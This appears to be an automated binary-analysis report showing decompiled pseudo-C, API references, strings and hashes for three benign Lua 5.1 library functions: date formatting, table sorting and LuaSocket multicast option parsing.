API ID: lua_pushnumber.$lua_type.$L_checkoption.lua_getfield.$L_argerror.L_checkinteger.L_error.lua_getfenv.lua_getmetatable.lua_pushcclosure.lua_pushlightuserdata.lua_pushnil.lua_pushstring.lua_rawequal.lua_settop.lua_tolstring.lua_touserdata.
String ID: alien buffer expected$alien: unknown type in buffer:get$alien_buffer$char$tostring
API String ID: 580621190-1782165115
Opcode ID: 0b20f92019b2d259e5a0d0e491bbbd856792e890b1922b89597539a50376dce2
Instruction ID: 1326fd785ce6daa3ae62fc514383bcab80ec252a9d844e5f566d283178681fea
Opcode Fuzzy Hash: 0b20f92019b2d259e5a0d0e491bbbd856792e890b1922b89597539a50376dce2
Instruction Fuzzy Hash: 67513933F0853423DE206A5DBD83BAD7374EF83725F500675FE1899282E66A9B1542E2

Uniqueness

Uniqueness Score: -1.00%

Function 10013720, Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 200
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E10013720(void* __ecx, void* __eflags, void* __fp0) {
				void* __ebx;
				intOrPtr _t34;
				intOrPtr* _t35;
				intOrPtr* _t36;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t68;
				void* _t69;
				intOrPtr* _t70;
				intOrPtr _t73;
				char _t76;
				intOrPtr _t84;
				intOrPtr _t85;
				intOrPtr _t93;
				intOrPtr* _t95;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_t113 = __fp0;
				_t94 =  *((intOrPtr*)(_t100 + 0x2ec));
				_t96 = E1000F4E0(__ecx, __eflags,  *((intOrPtr*)(_t100 + 0x2ec)), 1, 0x10019360, 0);
				_t34 = E10001410(__eflags,  *((intOrPtr*)(_t100 + 0x2ec)), 2);
				_t101 = _t100 + 0x18;
				if(_t34 > 0) {
					_t34 = E1000F540(_t69, __eflags, __fp0, _t94, 2);
					_t102 = _t101 + 8;
					L10016E30();
				} else {
					__imp__time(0);
					_t102 = _t101 + 4;
				}
				 *((intOrPtr*)(_t102 + 0x10)) = _t34;
				_t35 =  *_t96;
				if(_t35 != 0x21) {
					__imp__localtime(_t102 + 0x10);
					_t103 = _t102 + 4;
					_t70 = _t35;
				} else {
					_t68 = _t102 + 0x10;
					__imp__gmtime(_t68);
					_t103 = _t102 + 4;
					_t70 = _t68;
					_t96 = _t96 + 1;
				}
				if(_t70 != 0) {
					_t98 = "*t";
					_t36 = _t96;
					while(1) {
						_t85 =  *_t36;
						_t73 = _t85;
						__eflags = _t85 -  *_t98;
						if(_t85 !=  *_t98) {
							break;
						}
						__eflags = _t73;
						if(_t73 == 0) {
							L13:
							_t36 = 0;
						} else {
							_t93 =  *((intOrPtr*)(_t36 + 1));
							_t84 = _t93;
							_t6 = _t98 + 1; // 0x66000074
							__eflags = _t93 -  *_t6;
							if(_t93 !=  *_t6) {
								break;
							} else {
								_t36 = _t36 + 2;
								_t98 = _t98 + 2;
								__eflags = _t84;
								if(_t84 != 0) {
									continue;
								} else {
									goto L13;
								}
							}
						}
						L15:
						__eflags = _t36;
						if(_t36 != 0) {
							 *((char*)(_t103 + 0xc)) = 0x25;
							 *((char*)(_t103 + 0x16)) = 0;
							E1000FC00(_t94, _t103 + 0x14);
							_t39 =  *_t96;
							_t104 = _t103 + 8;
							__eflags = _t39;
							if(_t39 != 0) {
								_t95 = __imp__strftime;
								do {
									__eflags = _t39 - 0x25;
									if(_t39 != 0x25) {
										L22:
										__eflags =  *((intOrPtr*)(_t104 + 0x14)) - _t104 + 0x220;
										if(__eflags >= 0) {
											E1000F9E0(__eflags, _t104 + 0x14);
											_t104 = _t104 + 4;
										}
										 *((char*)( *((intOrPtr*)(_t104 + 0x14)))) =  *_t96;
										_t45 =  *((intOrPtr*)(_t104 + 0x14)) + 1;
										__eflags = _t45;
										 *((intOrPtr*)(_t104 + 0x14)) = _t45;
									} else {
										__eflags =  *((intOrPtr*)(_t96 + 1));
										if( *((intOrPtr*)(_t96 + 1)) == 0) {
											goto L22;
										} else {
											_t76 =  *((intOrPtr*)(_t96 + 1));
											_t96 = _t96 + 1;
											 *((char*)(_t104 + 0x1d)) = _t76;
											E1000FAC0(_t104 + 0x28, _t104 + 0x230,  *_t95(_t104 + 0x228, 0xc8, _t104 + 0xc, _t70));
											_t104 = _t104 + 0x1c;
										}
									}
									_t39 =  *((intOrPtr*)(_t96 + 1));
									_t96 = _t96 + 1;
									__eflags = _t39;
								} while (_t39 != 0);
							}
							E1000FB40(_t104 + 0x14);
							return 1;
						} else {
							E10001C70(_t94, _t36, 9);
							E10013960(_t113, _t94, "sec",  *_t70);
							E10013960(_t113, _t94, "min",  *((intOrPtr*)(_t70 + 4)));
							E10013960(_t113, _t94, "hour",  *((intOrPtr*)(_t70 + 8)));
							E10013960(_t113, _t94, "day",  *((intOrPtr*)(_t70 + 0xc)));
							E10013960(_t113, _t94, "month",  *((intOrPtr*)(_t70 + 0x10)) + 1);
							E10013960(_t113, _t94, "year",  *((intOrPtr*)(_t70 + 0x14)) + 0x76c);
							E10013960(_t113, _t94, "wday",  *((intOrPtr*)(_t70 + 0x18)) + 1);
							__eflags =  *((intOrPtr*)(_t70 + 0x1c)) + 1;
							E10013960(_t113, _t94, "yday",  *((intOrPtr*)(_t70 + 0x1c)) + 1);
							E10013990(_t94, "isdst",  *((intOrPtr*)(_t70 + 0x20)));
							return 1;
						}
						goto L27;
					}
					asm("sbb eax, eax");
					asm("sbb eax, 0xffffffff");
					goto L15;
				} else {
					E100018C0(_t94);
					return 1;
				}
				L27:
			}

0x10013720
0x10013729
0x10013742
0x10013744
0x10013749
0x1001374e
0x10013760
0x10013765
0x10013768
0x10013750
0x10013752
0x10013758
0x10013758
0x1001376d
0x10013771
0x10013775
0x1001378f
0x10013795
0x10013798
0x10013777
0x10013777
0x1001377c
0x10013782
0x10013785
0x10013787
0x10013787
0x1001379c
0x100137b7
0x100137bc
0x100137be
0x100137be
0x100137c0
0x100137c2
0x100137c5
0x00000000
0x00000000
0x100137c7
0x100137c9
0x100137df
0x100137df
0x100137cb
0x100137cb
0x100137ce
0x100137d0
0x100137d0
0x100137d3
0x00000000
0x100137d5
0x100137d5
0x100137d8
0x100137db
0x100137dd
0x00000000
0x00000000
0x00000000
0x00000000
0x100137dd
0x100137d3
0x100137e8
0x100137e8
0x100137eb
0x100138a2
0x100138a9
0x100138ae
0x100138b3
0x100138b5
0x100138b8
0x100138ba
0x100138bc
0x100138c2
0x100138c2
0x100138c4
0x10013902
0x1001390d
0x1001390f
0x10013916
0x1001391b
0x1001391b
0x10013924
0x1001392a
0x1001392a
0x1001392b
0x100138c6
0x100138c9
0x100138cb
0x00000000
0x100138cd
0x100138cd
0x100138d0
0x100138e4
0x100138f8
0x100138fd
0x100138fd
0x100138cb
0x1001392f
0x10013932
0x10013933
0x10013933
0x100138c2
0x1001393c
0x10013952
0x100137f1
0x100137f5
0x10013803
0x10013812
0x10013821
0x10013830
0x10013840
0x10013858
0x10013868
0x10013870
0x10013878
0x10013887
0x1001389d
0x1001389d
0x00000000
0x100137eb
0x100137e3
0x100137e5
0x00000000
0x1001379e
0x1001379f
0x100137b5
0x100137b5
0x00000000

APIs

luaL_optlstring.LUA5.1(?,00000001,10019360,00000000), ref: 1001373A

Part of subcall function 1000F4E0: lua_type.LUA5.1(?,?,?,?,1000F27E,?,?,?,00000000), ref: 1000F4EC

lua_type.LUA5.1(?,00000002,?,00000001,10019360,00000000), ref: 10013744
time.MSVCRT ref: 10013752
luaL_checknumber.LUA5.1(?,00000002), ref: 10013760
_ftol.MSVCRT ref: 10013768
gmtime.MSVCRT ref: 1001377C
localtime.MSVCRT ref: 1001378F
lua_pushnil.LUA5.1(?), ref: 1001379F
lua_createtable.LUA5.1(?,00000000,00000009), ref: 100137F5
luaL_buffinit.LUA5.1(?,?), ref: 100138AE
strftime.MSVCRT ref: 100138E8
luaL_addlstring.LUA5.1(?,?,00000000), ref: 100138F8
luaL_prepbuffer.LUA5.1(?), ref: 10013916
luaL_pushresult.LUA5.1(?), ref: 1001393C

Strings

hour, xrefs: 1001381B
yday, xrefs: 10013872
day, xrefs: 1001382A
wday, xrefs: 10013862
isdst, xrefs: 10013881
sec, xrefs: 100137FD
%, xrefs: 100138A2
min, xrefs: 1001380C
year, xrefs: 10013852
month, xrefs: 1001383A

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$L_addlstring.L_buffinit.L_checknumber.L_optlstring.L_prepbuffer.L_pushresult._ftolgmtimelocaltimelua_createtable.lua_pushnil.strftimetime
String ID: %$day$hour$isdst$min$month$sec$wday$yday$year
API String ID: 1219610304-4051842569
Opcode ID: 31eaa778872db4eb48442c85568471cbb604ae3334a3f45fed20d5dd43bcbe4d
Instruction ID: 496dac29d4681b1e01221c2d11c90bf35485a97460ebd694919cdc8cb7cba5df
Opcode Fuzzy Hash: 31eaa778872db4eb48442c85568471cbb604ae3334a3f45fed20d5dd43bcbe4d
Instruction Fuzzy Hash: 1E51F5E51082406BE311DF28DCC6FBB77E9DB82644F048458F9855F282E675E98983B2

Uniqueness

Uniqueness Score: -1.00%

Function 100140F0, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 230
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E100140F0(intOrPtr __edx, void* __fp0) {
				void* __edi;
				intOrPtr _t17;
				void* _t20;
				void* _t27;
				void* _t30;
				void* _t36;
				void* _t38;
				intOrPtr _t45;
				void* _t49;
				void* _t53;
				intOrPtr _t56;
				void* _t57;
				intOrPtr _t59;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t90;

				_t90 = __fp0;
				_t62 = __edx;
				_t56 =  *((intOrPtr*)(_t69 + 0xc));
				_t68 =  *((intOrPtr*)(_t69 + 0x14));
				_t79 = _t56 - _t68;
				if(_t56 >= _t68) {
					L28:
					return _t17;
				}
				_t67 =  *((intOrPtr*)(_t69 + 0x14));
				while(1) {
					L3:
					E10001C30(_t79, _t90, _t67, 1, _t56);
					E10001C30(_t79, _t90, _t67, 1, _t68);
					_t20 = E10014360(_t63, _t79, _t67, 0xffffffff, 0xfffffffe);
					_t70 = _t69 + 0x24;
					if(_t20 == 0) {
						E10001160(_t67, 0xfffffffd);
						_t71 = _t70 + 8;
					} else {
						E10014330(_t67, _t56, _t68);
						_t71 = _t70 + 0xc;
					}
					_t17 = _t68 - _t56;
					_t81 = _t17 - 1;
					 *((intOrPtr*)(_t71 + 0x1c)) = _t17;
					if(_t17 == 1) {
						goto L28;
					}
					asm("cdq");
					_t65 = _t56 + _t68 - _t62 >> 1;
					E10001C30(_t81, _t90, _t67, 1, _t56 + _t68 - _t62 >> 1);
					E10001C30(_t81, _t90, _t67, 1, _t56);
					_t27 = E10014360(_t65, _t81, _t67, 0xfffffffe, 0xffffffff);
					_t72 = _t71 + 0x24;
					if(_t27 == 0) {
						E10001160(_t67, 0xfffffffe);
						E10001C30(__eflags, _t90, _t67, 1, _t68);
						_t30 = E10014360(_t65, __eflags, _t67, 0xffffffff, 0xfffffffe);
						_t73 = _t72 + 0x20;
						__eflags = _t30;
						if(__eflags == 0) {
							_t17 = E10001160(_t67, 0xfffffffd);
							_t74 = _t73 + 8;
						} else {
							_t17 = E10014330(_t67, _t65, _t68);
							_t74 = _t73 + 0xc;
						}
					} else {
						_t17 = E10014330(_t67, _t65, _t56);
						_t74 = _t72 + 0xc;
					}
					_t83 =  *((intOrPtr*)(_t74 + 0x1c)) - 2;
					if( *((intOrPtr*)(_t74 + 0x1c)) == 2) {
						goto L28;
					} else {
						E10001C30(_t83, _t90, _t67, 1, _t65);
						E100013D0(_t83, _t67, 0xffffffff);
						_t57 = _t68 - 1;
						E10001C30(_t83, _t90, _t67, 1, _t57);
						E10014330(_t67, _t65, _t57);
						_t66 =  *((intOrPtr*)(_t74 + 0x44));
						_t75 = _t74 + 0x2c;
						while(1) {
							_t66 = _t66 + 1;
							E10001C30(_t83, _t90, _t67, 1, _t66);
							_t36 = E10014360(_t66, _t83, _t67, 0xffffffff, 0xfffffffe);
							_t76 = _t75 + 0x18;
							if(_t36 == 0) {
								goto L18;
							}
							do {
								L15:
								_t85 = _t66 - _t68;
								if(_t66 > _t68) {
									_push("invalid order function for sorting");
									_push(_t67);
									E1000F230();
									_t76 = _t76 + 8;
								}
								E10001160(_t67, 0xfffffffe);
								_t66 = _t66 + 1;
								E10001C30(_t85, _t90, _t67, 1, _t66);
								_t53 = E10014360(_t66, _t85, _t67, 0xffffffff, 0xfffffffe);
								_t76 = _t76 + 0x20;
								_t86 = _t53;
							} while (_t53 != 0);
							L18:
							_t57 = _t57 - 1;
							E10001C30(_t86, _t90, _t67, 1, _t57);
							_t38 = E10014360(_t66, _t86, _t67, 0xfffffffd, 0xffffffff);
							_t77 = _t76 + 0x18;
							if(_t38 == 0) {
								L22:
								_t83 = _t57 - _t66;
								if(_t57 < _t66) {
									E10001160(_t67, 0xfffffffc);
									_t58 = _t68 - 1;
									E10001C30(__eflags, _t90, _t67, 1, _t68 - 1);
									E10001C30(__eflags, _t90, _t67, 1, _t66);
									E10014330(_t67, _t58, _t66);
									_t59 =  *((intOrPtr*)(_t77 + 0x44));
									_t78 = _t77 + 0x2c;
									__eflags = _t66 - _t59 - _t68 - _t66;
									if(_t66 - _t59 >= _t68 - _t66) {
										_t45 = _t66 + 1;
										_t63 = _t68;
										_t68 = _t45 - 2;
									} else {
										_t63 = _t66 - 1;
										_t45 = _t59;
										_t62 = _t63 + 2;
										 *((intOrPtr*)(_t78 + 0x18)) = _t62;
										_t59 = _t62;
									}
									_push(_t63);
									_push(_t45);
									_push(_t67);
									_t17 = E100140F0(_t62, _t90);
									_t69 = _t78 + 0xc;
									__eflags = _t59 - _t68;
									if(__eflags < 0) {
										_t56 =  *((intOrPtr*)(_t69 + 0x18));
										goto L3;
									} else {
										goto L28;
									}
								}
								E10014330(_t67, _t66, _t57);
								_t75 = _t77 + 0xc;
								_t66 = _t66 + 1;
								E10001C30(_t83, _t90, _t67, 1, _t66);
								_t36 = E10014360(_t66, _t83, _t67, 0xffffffff, 0xfffffffe);
								_t76 = _t75 + 0x18;
								if(_t36 == 0) {
									goto L18;
								}
								goto L15;
							} else {
								goto L19;
							}
							do {
								L19:
								_t88 = _t57 -  *((intOrPtr*)(_t77 + 0x18));
								if(_t57 <  *((intOrPtr*)(_t77 + 0x18))) {
									_push("invalid order function for sorting");
									_push(_t67);
									E1000F230();
									_t77 = _t77 + 8;
								}
								E10001160(_t67, 0xfffffffe);
								_t57 = _t57 - 1;
								E10001C30(_t88, _t90, _t67, 1, _t57);
								_t49 = E10014360(_t66, _t88, _t67, 0xfffffffd, 0xffffffff);
								_t77 = _t77 + 0x20;
							} while (_t49 != 0);
							goto L22;
						}
					}
				}
				goto L28;
			}

0x100140f0
0x100140f0
0x100140f1
0x100140f6
0x100140fb
0x100140fe
0x10014320
0x10014320
0x10014320
0x10014104
0x1001410e
0x1001410e
0x10014112
0x1001411b
0x10014125
0x1001412a
0x1001412f
0x10014141
0x10014146
0x10014131
0x10014134
0x10014139
0x10014139
0x1001414b
0x1001414d
0x10014150
0x10014154
0x00000000
0x00000000
0x1001415d
0x10014162
0x10014168
0x10014171
0x1001417b
0x10014180
0x10014185
0x10014197
0x100141a0
0x100141aa
0x100141af
0x100141b2
0x100141b4
0x100141c6
0x100141cb
0x100141b6
0x100141b9
0x100141be
0x100141be
0x10014187
0x1001418a
0x1001418f
0x1001418f
0x100141ce
0x100141d3
0x00000000
0x100141d9
0x100141dd
0x100141e5
0x100141ea
0x100141f1
0x100141f9
0x100141fe
0x10014202
0x10014205
0x10014205
0x1001420a
0x10014214
0x10014219
0x1001421e
0x00000000
0x00000000
0x10014220
0x10014220
0x10014220
0x10014222
0x10014224
0x10014229
0x1001422a
0x1001422f
0x1001422f
0x10014235
0x1001423a
0x1001423f
0x10014249
0x1001424e
0x10014251
0x10014251
0x10014255
0x10014255
0x1001425a
0x10014264
0x10014269
0x1001426e
0x100142a7
0x100142a7
0x100142a9
0x100142be
0x100142c3
0x100142ca
0x100142d3
0x100142db
0x100142e0
0x100142ec
0x100142ef
0x100142f1
0x10014301
0x10014304
0x10014306
0x100142f3
0x100142f3
0x100142f4
0x100142f6
0x100142f9
0x100142fd
0x100142fd
0x10014309
0x1001430a
0x1001430b
0x1001430c
0x10014311
0x10014314
0x10014316
0x1001410a
0x00000000
0x00000000
0x00000000
0x00000000
0x10014316
0x100142ae
0x100142b3
0x10014205
0x1001420a
0x10014214
0x10014219
0x1001421e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10014270
0x10014270
0x10014270
0x10014274
0x10014276
0x1001427b
0x1001427c
0x10014281
0x10014281
0x10014287
0x1001428c
0x10014291
0x1001429b
0x100142a0
0x100142a3
0x00000000
0x10014270
0x10014205
0x100141d3
0x00000000

APIs

lua_rawgeti.LUA5.1(?,00000001,00000000,00000000,?,?,?,100140E4,?,00000001,00000000,?,00000002), ref: 10014112
lua_rawgeti.LUA5.1(?,00000001,?,?,00000001,00000000,00000000,?,?,?,100140E4,?,00000001,00000000,?,00000002), ref: 1001411B

Part of subcall function 10014360: lua_type.LUA5.1(?,00000002,?,1001412A,?,000000FF,000000FE,?,00000001,?,?,00000001,00000000,00000000,?), ref: 10014368
Part of subcall function 10014360: lua_pushvalue.LUA5.1(?,00000002,00000000,?,00000002), ref: 10014378
Part of subcall function 10014360: lua_pushvalue.LUA5.1(?,?,?,00000002,00000000,?,00000002), ref: 10014384
Part of subcall function 10014360: lua_pushvalue.LUA5.1(?,?,?,?,?,00000002,00000000,?,00000002), ref: 10014392
Part of subcall function 10014360: lua_call.LUA5.1(?,00000002,00000001,?,?,?,?,?,00000002,00000000,?,00000002), ref: 1001439C
Part of subcall function 10014360: lua_toboolean.LUA5.1(?,000000FF,?,00000002,00000001,?,?,?,?,?,00000002,00000000,?,00000002), ref: 100143A4
Part of subcall function 10014360: lua_settop.LUA5.1(?,000000FE,?,000000FF,?,00000002,00000001,?,?,?,?,?,00000002,00000000,?,00000002), ref: 100143AE

lua_settop.LUA5.1(?,000000FD,?,?,?,100140E4,?,00000001,00000000,?,00000002), ref: 10014141
lua_rawgeti.LUA5.1(?,00000001,?,?,?,?,?,?,100140E4,?,00000001,00000000,?,00000002), ref: 10014168
lua_rawgeti.LUA5.1(?,00000001,00000000,?,00000001,?,?,?,?,?,?,100140E4,?,00000001,00000000,?), ref: 10014171
lua_settop.LUA5.1(?,000000FE,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10014197
lua_rawgeti.LUA5.1(?,00000001,?,?,000000FE), ref: 100141A0

Part of subcall function 10014360: lua_lessthan.LUA5.1(?,?,?,?,00000002), ref: 100143C6

lua_settop.LUA5.1(?,000000FD), ref: 100141C6
lua_rawgeti.LUA5.1(?,00000001,?), ref: 100141DD
lua_pushvalue.LUA5.1(?,000000FF,?,00000001,?), ref: 100141E5
lua_rawgeti.LUA5.1(?,00000001,?,?,000000FF,?,00000001,?), ref: 100141F1
lua_rawgeti.LUA5.1(?,00000001,?), ref: 1001420A
luaL_error.LUA5.1(?,invalid order function for sorting), ref: 1001422A
lua_settop.LUA5.1(?,000000FE), ref: 10014235
lua_rawgeti.LUA5.1(?,00000001,?,?,000000FE), ref: 1001423F
lua_rawgeti.LUA5.1(?,00000001,?), ref: 1001425A

Part of subcall function 10014330: lua_rawseti.LUA5.1(?,00000001,?,?,100141FE,?,?,?,?,00000001,?,?,000000FF,?,00000001,?), ref: 1001433D
Part of subcall function 10014330: lua_rawseti.LUA5.1(?,00000001,00000002,?,00000001,?,?,100141FE,?,?,?,?,00000001,?,?,000000FF), ref: 1001434A

luaL_error.LUA5.1(?,invalid order function for sorting), ref: 1001427C
lua_settop.LUA5.1(?,000000FE), ref: 10014287
lua_rawgeti.LUA5.1(?,00000001,?,?,000000FE), ref: 10014291
lua_settop.LUA5.1(?,000000FC), ref: 100142BE
lua_rawgeti.LUA5.1(?,00000001,?,?,000000FC), ref: 100142CA
lua_rawgeti.LUA5.1(?,00000001,?,?,00000001,?,?,000000FC), ref: 100142D3

Strings

invalid order function for sorting, xrefs: 10014224, 10014276

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_rawgeti.$lua_settop.$lua_pushvalue.$L_error.lua_rawseti.$lua_call.lua_lessthan.lua_toboolean.lua_type.
String ID: invalid order function for sorting
API String ID: 1803563474-1445527858
Opcode ID: ff608e66da2001119989457a8dff74370521d6102f258cd215721b84c6582acc
Instruction ID: fd570815b798c5bdb263396b0e42c3073940818ee4ae8558b2410a289f45c0a3
Opcode Fuzzy Hash: ff608e66da2001119989457a8dff74370521d6102f258cd215721b84c6582acc
Instruction Fuzzy Hash: FB51367951852A32E911D6251D82ECF616DDF932F4F220314F930291E7EE3AFBC640BA

Uniqueness

Uniqueness Score: -1.00%

Function 00992AD0, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00992AD0(void* __eax, void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				char _v12;
				void* _t11;
				intOrPtr* _t13;
				void* _t17;
				void* _t18;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t28;
				void* _t29;
				char* _t30;
				intOrPtr _t32;
				void* _t34;
				void* _t35;
				void* _t37;
				void* _t38;
				void* _t39;

				_t29 = __edi;
				_t18 = __ebx;
				_t11 = __eax;
				_t32 = _a4;
				_push(3);
				_push(_t32);
				L00994AFA();
				_t34 =  &_v8 + 8;
				if(__eax != 5) {
					_push(5);
					_push(_t32);
					L00994B24();
					_push(__eax);
					_push(3);
					_push(_t32);
					L00994B1E();
					_t34 = _t34 + 0x14;
				}
				_push("multiaddr");
				_push(_t32);
				L00994AD0();
				_push(3);
				_push(_t32);
				L00994B00();
				_push(0xffffffff);
				_push(_t32);
				L00994AF4();
				_t35 = _t34 + 0x18;
				if(_t11 == 0) {
					_push("string \'multiaddr\' field expected");
					_push(3);
					_push(_t32);
					L00994B2A();
					_t35 = _t35 + 0xc;
				}
				_t12 =  &_v8;
				_push( &_v8);
				_push(0);
				_push(0xffffffff);
				L00994AE2();
				_t13 = E00991980(_t12, _t32);
				_t37 = _t35 + 0x14;
				if(_t13 == 0) {
					_push("invalid \'multiaddr\' ip address");
					_push(3);
					_push(_t32);
					L00994B2A();
					_t37 = _t37 + 0xc;
				}
				_push("interface");
				_push(_t32);
				L00994AD0();
				_push(3);
				_push(_t32);
				L00994B00();
				_push(0xffffffff);
				_push(_t32);
				L00994AF4();
				_t38 = _t37 + 0x18;
				if(_t13 == 0) {
					_push("string \'interface\' field expected");
					_push(3);
					_push(_t32);
					L00994B2A();
					_t38 = _t38 + 0xc;
				}
				_push(_t18);
				_push(_t29);
				_push(0);
				L00994A34();
				_push(0);
				_push(0xffffffff);
				_push(_t32);
				_v8 = _t13;
				_t30 = "*";
				L00994AE2();
				_t39 = _t38 + 0xc;
				while(1) {
					_t26 =  *_t13;
					_t22 = _t26;
					if(_t26 !=  *_t30) {
						break;
					}
					if(_t22 == 0) {
						L13:
						_t13 = 0;
						L15:
						if(_t13 != 0) {
							_t16 =  &_v8;
							_push( &_v8);
							_push(0);
							_push(0xffffffff);
							L00994AE2();
							_t17 = E00991980(_t16, _t32);
							_t39 = _t39 + 0x14;
							if(_t17 == 0) {
								_push("invalid \'interface\' ip address");
								_push(3);
								_push(_t32);
								L00994B2A();
								_t39 = _t39 + 0xc;
							}
						}
						_push(8);
						return E00992C40(_t32, _a4, _a8, _a12,  &_v12);
					}
					_t28 =  *((intOrPtr*)(_t13 + 1));
					_t5 =  &(_t30[1]); // 0x25000000
					_t25 = _t28;
					if(_t28 !=  *_t5) {
						break;
					}
					_t13 = _t13 + 2;
					_t30 =  &(_t30[2]);
					if(_t25 != 0) {
						continue;
					}
					goto L13;
				}
				asm("sbb eax, eax");
				asm("sbb eax, 0xffffffff");
				goto L15;
			}

0x00992ad0
0x00992ad0
0x00992ad0
0x00992ad4
0x00992ad8
0x00992ada
0x00992adb
0x00992ae0
0x00992ae6
0x00992ae8
0x00992aea
0x00992aeb
0x00992af0
0x00992af1
0x00992af3
0x00992af4
0x00992af9
0x00992af9
0x00992afc
0x00992b01
0x00992b02
0x00992b07
0x00992b09
0x00992b0a
0x00992b0f
0x00992b11
0x00992b12
0x00992b17
0x00992b1c
0x00992b1e
0x00992b23
0x00992b25
0x00992b26
0x00992b2b
0x00992b2b
0x00992b2e
0x00992b32
0x00992b33
0x00992b35
0x00992b38
0x00992b41
0x00992b46
0x00992b4b
0x00992b4d
0x00992b52
0x00992b54
0x00992b55
0x00992b5a
0x00992b5a
0x00992b5d
0x00992b62
0x00992b63
0x00992b68
0x00992b6a
0x00992b6b
0x00992b70
0x00992b72
0x00992b73
0x00992b78
0x00992b7d
0x00992b7f
0x00992b84
0x00992b86
0x00992b87
0x00992b8c
0x00992b8c
0x00992b8f
0x00992b90
0x00992b91
0x00992b93
0x00992b98
0x00992b9a
0x00992b9c
0x00992b9d
0x00992ba1
0x00992ba6
0x00992bab
0x00992bae
0x00992bae
0x00992bb2
0x00992bb6
0x00000000
0x00000000
0x00992bba
0x00992bd2
0x00992bd2
0x00992bdb
0x00992bdf
0x00992be1
0x00992be5
0x00992be6
0x00992be8
0x00992beb
0x00992bf4
0x00992bf9
0x00992bfe
0x00992c00
0x00992c05
0x00992c07
0x00992c08
0x00992c0d
0x00992c0d
0x00992bfe
0x00992c1c
0x00992c33
0x00992c33
0x00992bbc
0x00992bbf
0x00992bc2
0x00992bc6
0x00000000
0x00000000
0x00992bc8
0x00992bcb
0x00992bd0
0x00000000
0x00000000
0x00000000
0x00992bd0
0x00992bd6
0x00992bd8
0x00000000

APIs

lua_type.LUA5.1(?,00000003), ref: 00992ADB
lua_typename.LUA5.1(?,00000005), ref: 00992AEB
luaL_typerror.LUA5.1(?,00000003,00000000,?,00000005), ref: 00992AF4

Part of subcall function 00992C40: #21.WSOCK32(?,?,?,?,?,00992CCD,?,?,?,?,?,00000004,?,00000003,?,009928D6), ref: 00992C5B
Part of subcall function 00992C40: lua_pushnil.LUA5.1(?,?,?,?,?,?,?,00992CCD,?,?,?,?,?,00000004,?,00000003), ref: 00992C6A
Part of subcall function 00992C40: lua_pushstring.LUA5.1(?,setsockopt failed,?,?,?,?,?,?,?,00992CCD,?,?,?,?,?,00000004), ref: 00992C75

lua_pushstring.LUA5.1(?,multiaddr), ref: 00992B02
lua_gettable.LUA5.1(?,00000003,?,multiaddr), ref: 00992B0A
lua_isstring.LUA5.1(?,000000FF,?,00000003,?,multiaddr), ref: 00992B12
luaL_argerror.LUA5.1(?,00000003,string 'multiaddr' field expected), ref: 00992B26
lua_tolstring.LUA5.1(?,000000FF,00000000,?), ref: 00992B38
luaL_argerror.LUA5.1(?,00000003,invalid 'multiaddr' ip address,?,?,?,?,?), ref: 00992B55
lua_pushstring.LUA5.1(?,interface,?,?,?,?,?), ref: 00992B63
lua_gettable.LUA5.1(?,00000003,?,interface,?,?,?,?,?), ref: 00992B6B
lua_isstring.LUA5.1(?,000000FF,?,00000003,?,interface,?,?,?,?,?), ref: 00992B73
luaL_argerror.LUA5.1(?,00000003,string 'interface' field expected,?,?,?,?,?,?,?,?,?,?,?), ref: 00992B87
htonl.WSOCK32(00000000), ref: 00992B93
lua_tolstring.LUA5.1(?,000000FF,00000000,00000000), ref: 00992BA6
lua_tolstring.LUA5.1(?,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00992BEB
luaL_argerror.LUA5.1(?,00000003,invalid 'interface' ip address,?,?,?,?,?,?,?), ref: 00992C08

Strings

multiaddr, xrefs: 00992AFC
string 'interface' field expected, xrefs: 00992B7F
invalid 'multiaddr' ip address, xrefs: 00992B4D
interface, xrefs: 00992B5D
invalid 'interface' ip address, xrefs: 00992C00
string 'multiaddr' field expected, xrefs: 00992B1E

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

